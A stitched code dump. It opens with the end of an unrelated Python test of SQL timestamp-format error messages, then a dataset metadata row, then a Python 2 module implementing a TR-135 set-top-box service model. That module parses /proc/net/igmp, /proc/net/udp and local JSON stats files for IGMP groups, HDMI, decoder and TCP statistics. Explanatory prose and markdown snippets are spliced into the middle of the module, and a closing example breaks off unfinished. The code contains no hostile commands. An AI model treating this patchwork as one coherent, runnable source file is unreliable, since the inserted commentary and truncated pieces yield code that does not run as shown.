"as string format 'YYYY-MM-DD HH24:MI:SS TZH:TZM')")
assert "Timezone offset not allowed in a datetime to string conversion" in str(err)
# TZM requires TZH
err = self.execute_query_expect_failure(self.client,
"select cast('2018-12-31 08:00 AM 59' as timestamp FORMAT "
"'YYYY-MM-DD HH12:MI A.M. TZM')")
assert "TZH token is required for TZM" in str(err)
err = self.execute_query_expect_failure(self.client,
"select cast('2018-12-31 08:00 AM -59' as timestamp FORMAT "
"'YYYY-MM-DD HH12:MI A.M. TZM')")
assert "TZH token is required for TZM" in str(err)
# Multiple fraction second token conflict
err = self.execute_query_expect_failure(self.client,
"select cast('2018-10-10' as timestamp format 'FF FF1')")
assert "Multiple fractional second token provided." in str(err)
err = self.execute_query_expect_failure(self.client,
"select cast('2018-10-10' as timestamp format 'FF2 FF3')")
assert "Multiple fractional second token provided." in str(err)
err = self.execute_query_expect_failure(self.client,
"select cast('2018-10-10' as timestamp format 'FF4 FF5')")
assert "Multiple fractional second token provided." in str(err)
err = self.execute_query_expect_failure(self.client,
"select cast('2018-10-10' as timestamp format 'FF6 FF7')")
assert "Multiple fractional second token provided." in str(err)
err = self.execute_query_expect_failure(self.client,
"select cast('2018-10-10' as timestamp format 'FF8 FF9')")
assert "Multiple fractional second token provided." in str(err)
# Verify that conflict check is not skipped when format ends with separators.
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01' as timestamp format 'YYYY-MM-DD-RR--')")
assert "Both year and round year are provided" in str(err)
] | 1 | 2017-05-07T17:39:02.000Z | 2017-05-07T17:39:02.000Z | #!/usr/bin/python
# Copyright 2012 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# TR-069 has mandatory attribute names that don't comply with policy
# pylint:disable=invalid-name
"""Implementation of tr-135 STBService."""
__author__ = 'dgentry@google.com (Denton Gentry)'
import datetime
import glob
import json
import re
import socket
import struct
import time
import tornado.ioloop
import tr.core
import tr.cwmpdate
import tr.cwmptypes
import tr.session
import tr.tr135_v1_2
import tr.x_catawampus_videomonitoring_1_0 as vmonitor
BASE135STB = tr.tr135_v1_2.STBService_v1_2.STBService
CATA135STB = vmonitor.X_CATAWAMPUS_ORG_STBVideoMonitoring_v1_0.STBService
CATA135STBTOTAL = CATA135STB.ServiceMonitoring.MainStream.Total
IGMPREGEX = re.compile(r'^\s+(\S+)\s+\d\s+\d:[0-9A-Fa-f]+\s+\d')
IGMP6REGEX = re.compile((r'^\d\s+\S+\s+([0-9A-Fa-f]{32})\s+\d\s+[0-9A-Fa-f]'
r'+\s+\d'))
PROCNETIGMP = '/proc/net/igmp'
PROCNETIGMP6 = '/proc/net/igmp6'
PROCNETUDP = '/proc/net/udp'
CONT_MONITOR_FILES = [
'/tmp/cwmp/monitoring/ts/tr_135_total_tsstats%d.json',
'/tmp/cwmp/monitoring/dejittering/tr_135_total_djstats%d.json',
'/tmp/cwmp/monitoring/dejittering/tr_135_total_decoderstats%d.json',
'/tmp/cwmp/monitoring/tcp/tr_135_total_tcpstats%d.json',
]
EPG_STATS_FILES = ['/tmp/cwmp/monitoring/epg/tr_135_epg_stats*.json']
HDMI_STATS_FILE = '/tmp/cwmp/monitoring/hdmi/tr_135_hdmi_stats*.json'
HDMI_DISPLAY_DEVICE_STATS_FILES = [
'/tmp/cwmp/monitoring/hdmi/tr_135_dispdev_status*.json',
'/tmp/cwmp/monitoring/hdmi/tr_135_dispdev_stats*.json']
TIMENOW = time.time
def UnpackAlanCoxIP(packed):
"""Convert hex IP addresses to strings.
/proc/net/igmp and /proc/net/udp both contain IP addresses printed as
a hex string, _without_ calling ntohl() first.
Example from /proc/net/udp on a little endian machine:
sl local_address rem_address st tx_queue rx_queue ...
464: 010002E1:07D0 00000000:0000 07 00000000:00000000 ...
On a big-endian machine:
sl local_address rem_address st tx_queue rx_queue ...
464: E1020001:07D0 00000000:0000 07 00000000:00000000 ...
Args:
packed: the hex thingy.
Returns:
A conventional dotted quad IP address encoding.
"""
return socket.inet_ntop(socket.AF_INET, struct.pack('=L', int(packed, 16)))
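A quick illustration of why `'=L'` (native byte order) is the right repacking: the kernel printed the 32-bit address in host order, so packing it back natively restores network order on either endianness. The all-equal-bytes address below decodes identically on both, so that expected output is machine-independent; the docstring's own example value is endian-dependent and checked conditionally.

```python
import socket
import struct
import sys

def unpack_alan_cox_ip(packed):
    # Repack in native order ('=L'); the kernel printed in host order.
    return socket.inet_ntop(socket.AF_INET, struct.pack('=L', int(packed, 16)))

# Symmetric bytes decode the same on little- and big-endian hosts.
print(unpack_alan_cox_ip('01010101'))  # 1.1.1.1

# The docstring's example value depends on the host byte order:
expected = '225.2.0.1' if sys.byteorder == 'little' else '1.0.2.225'
assert unpack_alan_cox_ip('010002E1') == expected
```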
class STBService(BASE135STB):
"""STBService.{i}."""
def __init__(self, ioloop=None):
super(STBService, self).__init__()
self.Unexport(['Alias', 'Enable'])
self.Unexport(objects=['AVPlayers', 'AVStreams', 'Applications',
'Capabilities'])
self.Export(objects=['X_CATAWAMPUS-ORG_ProgramMetadata'])
self.ServiceMonitoring = ServiceMonitoring(ioloop=ioloop)
self.Components = Components()
self.X_CATAWAMPUS_ORG_ProgramMetadata = ProgMetadata()
class Components(BASE135STB.Components):
"""STBService.{i}.Components."""
def __init__(self):
super(Components, self).__init__()
self.Unexport(['AudioDecoderNumberOfEntries', 'AudioOutputNumberOfEntries',
'CANumberOfEntries', 'DRMNumberOfEntries',
'SCARTNumberOfEntries', 'SPDIFNumberOfEntries',
'VideoDecoderNumberOfEntries', 'VideoOutputNumberOfEntries'])
self.Unexport(objects=['PVR'])
self.Unexport(lists=['AudioDecoder', 'AudioOutput', 'CA', 'DRM', 'SCART',
'SPDIF', 'VideoDecoder', 'VideoOutput'])
self.FrontEndList = {'1': FrontEnd()}
self.HDMIList = {'1': HDMI()}
@property
def FrontEndNumberOfEntries(self):
return len(self.FrontEndList)
@property
def HDMINumberOfEntries(self):
return len(self.HDMIList)
class FrontEnd(BASE135STB.Components.FrontEnd):
"""STBService.{i}.Components.FrontEnd.{i}."""
def __init__(self):
super(FrontEnd, self).__init__()
self.Unexport(['Alias', 'Enable', 'Name', 'Status'])
self.Unexport(objects=['DVBT'])
self.IP = IP()
class IP(BASE135STB.Components.FrontEnd.IP):
"""STBService.{i}.Components.FrontEnd.{i}.IP."""
def __init__(self):
super(IP, self).__init__()
self.Unexport(['ActiveInboundIPStreams', 'ActiveOutboundIPStreams',
'InboundNumberOfEntries', 'OutboundNumberOfEntries'])
self.Unexport(objects=['Dejittering', 'RTCP', 'RTPAVPF', 'ServiceConnect',
'FEC', 'ForceMonitor'])
self.Unexport(lists=['Inbound', 'Outbound'])
self.IGMP = IGMP()
class IGMP(BASE135STB.Components.FrontEnd.IP.IGMP):
"""STBService.{i}.Components.FrontEnd.{i}.IP.IGMP."""
def __init__(self):
super(IGMP, self).__init__()
self.Unexport(['ClientGroupStatsNumberOfEntries', 'ClientRobustness',
'ClientUnsolicitedReportInterval', 'ClientVersion',
'DSCPMark', 'Enable', 'EthernetPriorityMark',
'LoggingEnable', 'MaximumNumberOfConcurrentGroups',
'MaximumNumberOfTrackedGroups', 'Status', 'VLANIDMark'])
self.Unexport(lists=['ClientGroupStats'])
self._ClientGroups = dict()
self.ClientGroupList = tr.core.AutoDict(
'ClientGroupList', iteritems=self.IterClientGroups,
getitem=self.GetClientGroupByIndex)
@property
def ClientGroupNumberOfEntries(self):
return len(self.ClientGroupList)
@tr.session.cache_as_list
def _ParseProcIgmp(self):
"""Get the list of multicast groups subscribed to.
/proc/net/igmp uses an unusual format:
Idx Device : Count Querier Group Users Timer Reporter
1 lo : 1 V3
010000E0 1 0:00000000 0
2 eth0 : 1 V3
010000E0 1 0:00000000 0
010000E0 is the IP multicast address as a hex number, and always
big endian.
Returns:
a list of strings of the IP addresses of current IGMP group memberships.
"""
igmp4s = set()
igmp6s = set()
with open(PROCNETIGMP, 'r') as f:
for line in f:
result = IGMPREGEX.match(line)
if result is not None:
igmp = result.group(1).strip()
igmp4s.add(UnpackAlanCoxIP(igmp))
with open(PROCNETIGMP6, 'r') as f:
for line in f:
result = IGMP6REGEX.match(line)
if result is not None:
igmp = result.group(1).strip()
ip6 = ':'.join([igmp[0:4], igmp[4:8], igmp[8:12], igmp[12:16],
igmp[16:20], igmp[20:24], igmp[24:28], igmp[28:]])
igmp6s.add(socket.inet_ntop(
socket.AF_INET6, socket.inet_pton(socket.AF_INET6, ip6)))
return sorted(list(igmp4s)) + sorted(list(igmp6s))
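The regex above can be exercised against the docstring's sample layout; this standalone sketch shows IGMPREGEX pulling the hex group address out of a /proc/net/igmp dump (sample lines mirror the docstring, not a live system):

```python
import re

IGMPREGEX = re.compile(r'^\s+(\S+)\s+\d\s+\d:[0-9A-Fa-f]+\s+\d')

sample = [
    'Idx Device    : Count Querier  Group    Users Timer    Reporter',
    '1   lo        :     1      V3',
    '                                010000E0     1 0:00000000       0',
]
# Only the indented group-membership line matches; the header and the
# device lines start with a non-space character, so ^\s+ rejects them.
groups = [m.group(1) for m in (IGMPREGEX.match(l) for l in sample) if m]
print(groups)  # ['010000E0']
```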
@tr.session.cache
def _UpdateClientGroups(self):
"""Maintain stable instance numbers for ClientGroups."""
igmps = self._ParseProcIgmp()
num_igmps = len(igmps)
new_igmps = dict()
old_igmps = self._ClientGroups
# Existing ClientGroups keep their instance number in self._ClientGroups
for instance, old_ipaddr in old_igmps.items():
if old_ipaddr in igmps:
new_igmps[instance] = old_ipaddr
igmps.remove(old_ipaddr)
# Remaining IP addresses claim an unused instance number in 1..num_igmps
assigned = set(new_igmps.keys())
unassigned = set(range(1, num_igmps + 1)) - assigned
for ipaddr in igmps:
instance = unassigned.pop()
new_igmps[instance] = ipaddr
self._ClientGroups = new_igmps
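The renumbering scheme above (survivors keep their instance number, newcomers take unused slots in 1..N) can be sketched independently. `stable_assign` is an illustrative name, and it pops from a sorted list for deterministic output where the method above uses `set.pop()`:

```python
def stable_assign(old_map, current_items):
    """Renumber instances: survivors keep their number, newcomers fill gaps."""
    remaining = list(current_items)
    new_map = {}
    for instance, item in old_map.items():
        if item in remaining:
            new_map[instance] = item
            remaining.remove(item)
    # Hand out unused numbers in 1..N, lowest first (deterministic variant).
    unused = sorted(set(range(1, len(current_items) + 1)) - set(new_map),
                    reverse=True)
    for item in remaining:
        new_map[unused.pop()] = item
    return new_map

# 'b' keeps instance 2; new item 'c' takes the freed slot 1.
print(stable_assign({1: 'a', 2: 'b'}, ['b', 'c']))  # {2: 'b', 1: 'c'}
```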
def GetClientGroup(self, ipaddr):
return ClientGroup(ipaddr)
def IterClientGroups(self):
"""Retrieves an iterable list of ClientGroups."""
self._UpdateClientGroups()
for key, ipaddr in self._ClientGroups.items():
yield str(key), self.GetClientGroup(ipaddr)
@tr.session.cache
def GetClientGroupByIndex(self, index):
"""Directly access the value corresponding to a given key."""
self._UpdateClientGroups()
return self.GetClientGroup(self._ClientGroups[index])
class ClientGroup(BASE135STB.Components.FrontEnd.IP.IGMP.ClientGroup):
"""STBService.{i}.Components.FrontEnd.{i}.IP.IGMP.ClientGroup.{i}."""
GroupAddress = tr.cwmptypes.ReadOnlyString('')
def __init__(self, ipaddr):
super(ClientGroup, self).__init__()
self.Unexport(['Alias', 'UpTime'])
type(self).GroupAddress.Set(self, ipaddr)
class HDMI(BASE135STB.Components.HDMI):
"""STBService.{i}.Components.HDMI."""
ResolutionMode = tr.cwmptypes.ReadOnlyString('Auto')
def __init__(self):
super(HDMI, self).__init__()
self.Unexport(['Alias', 'Enable', 'Name', 'Status'])
self._UpdateStats()
@tr.session.cache
def _UpdateStats(self):
  """Read data in from JSON files."""
  data = dict()
  # HDMI_STATS_FILE is a glob pattern, so expand it rather than open it
  # directly (mirroring HDMIDisplayDevice._UpdateStats below).
  for filename in glob.glob(HDMI_STATS_FILE):
    try:
      with open(filename) as f:
        d = json.load(f)
      data.update(d['HDMIStats'])
    except IOError:
      # It's normal for the file to go away when the HDMI is not active.
      pass
    except (ValueError, KeyError) as e:
      # ValueError - JSON file is malformed and cannot be decoded
      # KeyError - Decoded JSON file doesn't contain the required fields.
      print('HDMIStats: Failed to read stats from file {0}, '
            'error = {1}'.format(filename, e))
  self.data = data
@property
def DisplayDevice(self):
return HDMIDisplayDevice()
@property
def ResolutionValue(self):
self._UpdateStats()
return self.data.get('ResolutionValue', '')
class HDMIDisplayDevice(CATA135STB.Components.HDMI.DisplayDevice):
"""STBService.{i}.Components.HDMI.{i}.DisplayDevice."""
def __init__(self):
super(HDMIDisplayDevice, self).__init__()
self.Unexport(['CECSupport'])
self.data = self._UpdateStats()
@tr.session.cache
def _UpdateStats(self):
data = dict()
for wildcard in HDMI_DISPLAY_DEVICE_STATS_FILES:
for filename in glob.glob(wildcard):
try:
with open(filename) as f:
d = json.load(f)
data.update(d['HDMIDisplayDevice'])
except IOError:
# It's normal for the file to go away when the HDMI is not active.
pass
except (ValueError, KeyError) as e:
# ValueError - JSON file is malformed and cannot be decoded
# KeyError - Decoded JSON file doesn't contain the required fields.
print('HDMIDisplayDevice: Failed to read stats from file {0}, '
'error = {1}'.format(filename, e))
return data
@property
def Status(self):
return self.data.get('Status', 'None')
@property
def Name(self):
return self.data.get('Name', '')
@property
def SupportedResolutions(self):
supported = self.data.get('SupportedResolutions', None)
if supported:
# There can be duplicates in the supported list.
supportedset = set(supported)
return ', '.join(sorted(supportedset))
else:
return ''
@property
def EEDID(self):
return self.data.get('EEDID', '')
@property
def X_GOOGLE_COM_EDIDExtensions(self):
extensions = self.data.get('EDIDExtensions', None)
if extensions:
return ', '.join(extensions)
else:
return ''
@property
def PreferredResolution(self):
return self.data.get('PreferredResolution', '')
@property
def VideoLatency(self):
return self.data.get('VideoLatency', 0)
@property
def AutoLipSyncSupport(self):
return self.data.get('AutoLipSyncSupport', False)
@property
def HDMI3DPresent(self):
return self.data.get('HDMI3DPresent', False)
@property
def X_GOOGLE_COM_NegotiationCount4(self):
return self.data.get('Negotiations4hr', 0)
@property
def X_GOOGLE_COM_NegotiationCount24(self):
return self.data.get('Negotiations24hr', 0)
@property
def X_GOOGLE_COM_HDCPAuthFailureCnt(self):
return self.data.get('HDCPAuthFailureCnt', 0)
@property
def X_GOOGLE_COM_VendorId(self):
return self.data.get('VendorId', '')
@property
def X_GOOGLE_COM_ProductId(self):
return self.data.get('ProductId', 0)
@property
def X_GOOGLE_COM_MfgYear(self):
return self.data.get('MfgYear', 1990)
@property
def X_GOOGLE_COM_LastUpdateTimestamp(self):
return tr.cwmpdate.format(float(self.data.get('LastUpdateTime', 0)))
class ServiceMonitoring(CATA135STB.ServiceMonitoring):
"""STBService.{i}.ServiceMonitoring."""
X_CATAWAMPUS_ORG_StallAlarmResetTime = tr.cwmptypes.Unsigned()
X_CATAWAMPUS_ORG_StallAlarmValue = tr.cwmptypes.Unsigned()
def __init__(self, ioloop=None):
super(ServiceMonitoring, self).__init__()
self._ioloop = ioloop or tornado.ioloop.IOLoop.instance()
self.Unexport(['FetchSamples', 'ForceSample', 'ReportEndTime',
'ReportSamples', 'ReportStartTime', 'SampleEnable',
'SampleInterval', 'SampleState', 'TimeReference',
'EventsPerSampleInterval'])
self.Unexport(objects=['GlobalOperation'])
self.stall_alarm_time = 0.0
self.stall_alarm_reset_handler = None
self.X_CATAWAMPUS_ORG_StallAlarmResetTime = 45 * 60
self.X_CATAWAMPUS_ORG_StallAlarmValue = 0
self.MainStreamList = {}
for x in range(1, 9):
self.MainStreamList[x] = MainStream(x)
# client-only MainStreams.
self.MainStreamList[256] = MainStream(256)
@property
def MainStreamNumberOfEntries(self):
return len(self.MainStreamList)
def _StallAlarmReset(self):
self.stall_alarm_time = 0.0
self.stall_alarm_reset_handler = None
def _CheckForStall(self):
for ms in self.MainStreamList.values():
mcast = ms.Total.X_CATAWAMPUS_ORG_MulticastStats
threshold = self.X_CATAWAMPUS_ORG_StallAlarmValue
if threshold and (mcast.StallTime > threshold):
return True
return False
def GetAlarmTime(self):
if not self.stall_alarm_time and self._CheckForStall():
self.stall_alarm_time = TIMENOW()
seconds = self.X_CATAWAMPUS_ORG_StallAlarmResetTime
self.stall_alarm_reset_handler = self._ioloop.add_timeout(
datetime.timedelta(seconds=seconds), self._StallAlarmReset)
return tr.cwmpdate.format(self.stall_alarm_time)
def SetAlarmTime(self, value):
# We don't allow writing arbitrary time. Any write clears the alarm.
self.stall_alarm_time = 0.0
X_CATAWAMPUS_ORG_StallAlarmTime = property(
GetAlarmTime, SetAlarmTime, None,
'X_CATAWAMPUS_ORG_StallAlarmTime')
class MainStream(BASE135STB.ServiceMonitoring.MainStream):
"""STBService.{i}.ServiceMonitoring.MainStream."""
def __init__(self, idx):
super(MainStream, self).__init__()
self.Unexport(['AVStream', 'Enable', 'Gmin', 'ServiceType',
'SevereLossMinDistance', 'SevereLossMinLength', 'Status',
'ChannelChangeFailureTimeout', 'Alias'])
self.Unexport(objects=['Sample'])
self.Total = Total(idx)
class Total(CATA135STBTOTAL):
"""STBService.{i}.ServiceMonitoring.MainStream.{i}.Total."""
def __init__(self, idx):
super(Total, self).__init__()
self.idx = idx
self.Unexport(['Reset', 'ResetTime', 'TotalSeconds'])
self.Unexport(objects=['AudioDecoderStats', 'RTPStats',
'VideoDecoderStats', 'VideoResponseStats'])
self.data = {}
self.udp = {}
@property
def DejitteringStats(self):
self._UpdateStats()
return DejitteringStats(self.data.get('DejitteringStats', {}))
@property
def MPEG2TSStats(self):
self._UpdateStats()
return MPEG2TSStats(self.data.get('MPEG2TSStats', {}))
@property
def TCPStats(self):
self._UpdateStats()
return TCPStats(self.data.get('TCPStats', {}))
@property
def X_CATAWAMPUS_ORG_MulticastStats(self):
self._UpdateStats()
return MulticastStats(self.data.get('MulticastStats', {}), self.udp)
@property
def X_CATAWAMPUS_ORG_DecoderStats(self):
self._UpdateStats()
return DecoderStats(self.data.get('DecoderStats', {}))
@tr.session.cache
def _UpdateProcNetUDP(self, udp):
"""Parse /proc/net/udp.
sl local_address rem_address st tx_queue rx_queue tr tm->when retrnsmt
464: 010002E1:07D0 00000000:0000 07 00000000:00000000 00:00000000 00000000
uid timeout inode ref pointer drops
0 0 6187 2 b1f64e00 0
Args:
udp: a dict to store the parsed (rxq, drops) fields in.
"""
with open(PROCNETUDP) as f:
for line in f:
try:
line = ' '.join(line.split())
fields = re.split('[ :]', line)
ip = UnpackAlanCoxIP(fields[2])
port = int(fields[3], 16)
key = '%s:%d' % (ip, port)
udp[key] = (int(fields[8], 16), int(fields[17])) # rxq, drops
except (ValueError, IndexError):
# comment line, or something
continue
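The field arithmetic above can be checked against the docstring's sample layout. This standalone sketch (helper names illustrative) uses a symmetric address so the expected key is the same on either endianness; note that `re.split('[ :]', ...)` yields an empty field after the `sl` column's trailing colon, which is why rxq lands at index 8 and drops at index 17:

```python
import re
import socket
import struct

def unpack_ip(packed):
    return socket.inet_ntop(socket.AF_INET, struct.pack('=L', int(packed, 16)))

def parse_udp_line(line):
    line = ' '.join(line.split())        # collapse runs of whitespace
    fields = re.split('[ :]', line)      # fields[1] is '' from the '464: ' column
    key = '%s:%d' % (unpack_ip(fields[2]), int(fields[3], 16))
    return key, (int(fields[8], 16), int(fields[17]))  # (rxq, drops)

line = ('  464: 01010101:1F90 00000000:0000 07 00000000:0000002A '
        '00:00000000 00000000 0 0 6187 2 b1f64e00 5')
print(parse_udp_line(line))  # ('1.1.1.1:8080', (42, 5))
```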
@tr.session.cache
def _UpdateTotalStats(self, data):
"""Read stats in from JSON files."""
for pattern in CONT_MONITOR_FILES:
filename = pattern % self.idx
try:
with open(filename) as f:
d = json.load(f)
data.update(d['STBService'][0]['MainStream'][0])
except IOError:
# This is normal; the file only exists while the stream is actively in use.
pass
except (ValueError, KeyError) as e:
# ValueError - JSON file is malformed and cannot be decoded
# KeyError - Decoded JSON file doesn't contain the required fields.
print('ServiceMonitoring: Failed to read stats from file {0}, '
'error = {1}'.format(filename, e))
@tr.session.cache
def _UpdateStats(self):
self.data = {}
self._UpdateTotalStats(self.data)
self.udp = {}
self._UpdateProcNetUDP(self.udp)
class DejitteringStats(BASE135STB.ServiceMonitoring.MainStream.Total.
                       DejitteringStats):
  """STBService.{i}.ServiceMonitoring.MainStream.{i}.Total.DejitteringStats."""

  def __init__(self, data):
    super(DejitteringStats, self).__init__()
    self.data = data
    self.Unexport(['TotalSeconds'])

  @property
  def EmptyBufferTime(self):
    return int(self.data.get('EmptyBufferTime', 0))

  @property
  def Overruns(self):
    return int(self.data.get('Overruns', 0))

  @property
  def Underruns(self):
    return int(self.data.get('Underruns', 0))

  @property
  def X_GOOGLE_COM_SessionID(self):
    return int(self.data.get('SessionId', 0))


class MPEG2TSStats(CATA135STB.ServiceMonitoring.MainStream.Total.MPEG2TSStats):
  """STBService.{i}.ServiceMonitoring.MainStream.{i}.Total.MPEG2TSStats."""

  def __init__(self, data):
    super(MPEG2TSStats, self).__init__()
    self.data = data
    self.Unexport(['PacketDiscontinuityCounterBeforeCA',
                   'TSSyncByteErrorCount', 'TSSyncLossCount', 'TotalSeconds'])

  @property
  def PacketDiscontinuityCounter(self):
    return int(self.data.get('PacketDiscontinuityCounter', 0))

  @property
  def TSPacketsReceived(self):
    return int(self.data.get('TSPacketsReceived', 0))

  @property
  def X_CATAWAMPUS_ORG_DropBytes(self):
    return int(self.data.get('DropBytes', 0))

  @property
  def X_CATAWAMPUS_ORG_DropPackets(self):
    return int(self.data.get('DropPackets', 0))

  @property
  def X_CATAWAMPUS_ORG_PacketErrorCount(self):
    return int(self.data.get('PacketErrorCount', 0))


class TCPStats(CATA135STB.ServiceMonitoring.MainStream.Total.TCPStats):
  """STBService.{i}.ServiceMonitoring.MainStream.{i}.Total.TCPStats."""

  def __init__(self, data):
    super(TCPStats, self).__init__()
    self.data = data
    self.Unexport(['TotalSeconds'])

  @property
  def BytesReceived(self):
    return long(self.data.get('BytesReceived', 0))

  @property
  def PacketsReceived(self):
    return long(self.data.get('PacketsReceived', 0))

  @property
  def PacketsRetransmitted(self):
    return long(self.data.get('TotalRetransmits', 0))

  @property
  def X_CATAWAMPUS_ORG_BytesSent(self):
    return long(self.data.get('BytesSent', 0))

  @property
  def X_CATAWAMPUS_ORG_Cwnd(self):
    return long(self.data.get('Cwnd', 0))

  @property
  def X_CATAWAMPUS_ORG_SlowStartThreshold(self):
    return long(self.data.get('SSThresh', 0))

  @property
  def X_CATAWAMPUS_ORG_Unacked(self):
    return long(self.data.get('Unacked', 0))

  @property
  def X_CATAWAMPUS_ORG_Sacked(self):
    return long(self.data.get('Sacked', 0))

  @property
  def X_CATAWAMPUS_ORG_Lost(self):
    return long(self.data.get('Lost', 0))

  @property
  def X_CATAWAMPUS_ORG_Rtt(self):
    return long(self.data.get('Rtt', 0))

  @property
  def X_CATAWAMPUS_ORG_RttVariance(self):
    return long(self.data.get('RttVariance', 0))

  @property
  def X_CATAWAMPUS_ORG_ReceiveRTT(self):
    return long(self.data.get('ReceiveRTT', 0))

  @property
  def X_CATAWAMPUS_ORG_ReceiveSpace(self):
    return long(self.data.get('ReceiveSpace', 0))

  @property
  def X_CATAWAMPUS_ORG_RetransmitTimeout(self):
    return long(self.data.get('RetransTimeout', 0))


class MulticastStats(CATA135STBTOTAL.X_CATAWAMPUS_ORG_MulticastStats):
  """ServiceMonitoring.MainStream.{i}.Total.X_CATAWAMPUS_ORG_MulticastStats."""

  def __init__(self, data, udp):
    super(MulticastStats, self).__init__()
    self.data = data
    self.udp = udp

  @property
  def BPS(self):
    return int(self.data.get('bps', 0))

  @property
  def MulticastGroup(self):
    return str(self.data.get('MulticastGroup', ''))

  @property
  def StallTime(self):
    stalled = long(self.data.get('StalledUsecs', 0))
    return int(stalled / 1000)

  @property
  def StartupLatency(self):
    latency = long(self.data.get('StartupLagUsecs', 0))
    return int(latency / 1000)

  @property
  def MissedSchedule(self):
    schedule = int(self.data.get('MissingSchedule', 0))
    return schedule

  @property
  def UdpRxQueue(self):
    (rxq, _) = self.udp.get(self.MulticastGroup, (0, 0))
    return rxq

  @property
  def UdpDrops(self):
    (_, drops) = self.udp.get(self.MulticastGroup, (0, 0))
    return drops


class ProgMetadata(CATA135STB.X_CATAWAMPUS_ORG_ProgramMetadata):
  """STBService.{i}.X_CATAWAMPUS_ORG_ProgramMetadata."""

  def __init__(self):
    super(ProgMetadata, self).__init__()

  @property
  def EPG(self):
    return EPG()


class DecoderStats(CATA135STBTOTAL.X_CATAWAMPUS_ORG_DecoderStats):
  """ServiceMonitoring.MainStream.{i}.Total.X_CATAWAMPUS_ORG_DecoderStats."""

  def __init__(self, data):
    super(DecoderStats, self).__init__()
    self.data = data

  @property
  def VideoBytesDecoded(self):
    return long(self.data.get('VideoBytesDecoded', 0))

  @property
  def DecodeDrops(self):
    return long(self.data.get('DecodeDrops', 0))

  @property
  def VideoDecodeErrors(self):
    return long(self.data.get('VideoDecodeErrors', 0))

  @property
  def DecodeOverflows(self):
    return long(self.data.get('DecodeOverflows', 0))

  @property
  def DecodedPictures(self):
    return long(self.data.get('DecodedPictures', 0))

  @property
  def DisplayDrops(self):
    return long(self.data.get('DisplayDrops', 0))

  @property
  def DisplayErrors(self):
    return long(self.data.get('DisplayErrors', 0))

  @property
  def DisplayUnderflows(self):
    return long(self.data.get('DisplayUnderflows', 0))

  @property
  def DisplayedPictures(self):
    return long(self.data.get('DisplayedPictures', 0))

  @property
  def ReceivedPictures(self):
    return long(self.data.get('ReceivedPictures', 0))

  @property
  def VideoWatchdogs(self):
    return long(self.data.get('VideoWatchdogs', 0))

  @property
  def VideoPtsStcDifference(self):
    return long(self.data.get('VideoPtsStcDifference', 0))

  @property
  def VideoFifoDepth(self):
    return long(self.data.get('VideoFifoDepth', 0))

  @property
  def VideoDisplayQueueDepth(self):
    return long(self.data.get('VideoDisplayQueueDepth', 0))

  @property
  def VideoCabacQueueDepth(self):
    return long(self.data.get('VideoCabacQueueDepth', 0))

  @property
  def VideoEnhancementFifoDepth(self):
    return long(self.data.get('VideoEnhancementFifoDepth', 0))

  @property
  def VideoPts(self):
    return long(self.data.get('VideoPts', 0))

  @property
  def AudioDecodedFrames(self):
    return long(self.data.get('AudioDecodedFrames', 0))

  @property
  def AudioDecodeErrors(self):
    return long(self.data.get('AudioDecodeErrors', 0))

  @property
  def AudioDummyFrames(self):
    return long(self.data.get('AudioDummyFrames', 0))

  @property
  def AudioFifoOverflows(self):
    return long(self.data.get('AudioFifoOverflows', 0))

  @property
  def AudioFifoUnderflows(self):
    return long(self.data.get('AudioFifoUnderflows', 0))

  @property
  def AudioWatchdogs(self):
    return long(self.data.get('AudioWatchdogs', 0))

  @property
  def AudioBytesDecoded(self):
    return long(self.data.get('AudioBytesDecoded', 0))

  @property
  def AudioPtsStcDifference(self):
    return long(self.data.get('AudioPtsStcDifference', 0))

  @property
  def AudioFifoDepth(self):
    return long(self.data.get('AudioFifoDepth', 0))

  @property
  def AudioQueuedFrames(self):
    return long(self.data.get('AudioQueuedFrames', 0))

  @property
  def AudioPts(self):
    return long(self.data.get('AudioPts', 0))

  @property
  def AudioVideoPtsDifference(self):
    audio_pts = long(self.data.get('AudioPts', 0))
    video_pts = long(self.data.get('VideoPts', 0))
    if audio_pts is not None and video_pts is not None:
      return audio_pts - video_pts
    else:
      return 0


class EPG(CATA135STB.X_CATAWAMPUS_ORG_ProgramMetadata.EPG):
  """STBService.{i}.X_CATAWAMPUS_ORG_ProgramMetadata.EPG."""

  def __init__(self):
    super(EPG, self).__init__()
    self.data = self._GetStats()

  @tr.session.cache
  def _GetStats(self):
    """Generate stats object from the JSON stats."""
    data = dict()
    for wildcard in EPG_STATS_FILES:
      for filename in glob.glob(wildcard):
        try:
          with open(filename) as f:
            d = json.load(f)
            data.update(d['EPGStats'])
        # IOError - Failed to open file or failed to read from file
        # ValueError - JSON file is malformed and cannot be decoded
        # KeyError - Decoded JSON file doesn't contain the required fields.
        except (IOError, ValueError, KeyError) as e:
          print('EPGStats: Failed to read stats from file {0}, '
                'error = {1}'.format(filename, e))
    return data

  @property
  def MulticastPackets(self):
    return self.data.get('MulticastPackets', 0)

  @property
  def EPGErrors(self):
    return self.data.get('EPGErrors', 0)

  @property
  def LastReceivedTime(self):
    last = self.data.get('LastReceivedTime', 0)
    return tr.cwmpdate.format(float(last))

  @property
  def EPGExpireTime(self):
    return tr.cwmpdate.format(float(self.data.get('EPGExpireTime', 0)))

  @property
  def NumChannels(self):
    return self.data.get('NumChannels', 0)

  @property
  def NumEnabledChannels(self):
    return self.data.get('NumEnabledChannels', 0)
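The glob-and-merge pattern used by `_GetStats` above can be exercised standalone. The sketch below (file names and the `gather_stats` helper are hypothetical, not part of the original module) mirrors its layered error handling with only the standard library:

```python
import glob
import json
import os
import tempfile


def gather_stats(wildcards):
    """Merge the 'EPGStats' dict from every JSON file matching the globs.

    Unreadable, malformed, or incomplete files are skipped with a message,
    mirroring the error handling in EPG._GetStats above.
    """
    data = {}
    for wildcard in wildcards:
        for filename in glob.glob(wildcard):
            try:
                with open(filename) as f:
                    d = json.load(f)
                data.update(d['EPGStats'])
            except (IOError, ValueError, KeyError) as e:
                print('Failed to read stats from file {0}, error = {1}'.format(
                    filename, e))
    return data


# Example: one good file and one malformed file in a temp directory.
tmpdir = tempfile.mkdtemp()
with open(os.path.join(tmpdir, 'good.json'), 'w') as f:
    json.dump({'EPGStats': {'NumChannels': 42}}, f)
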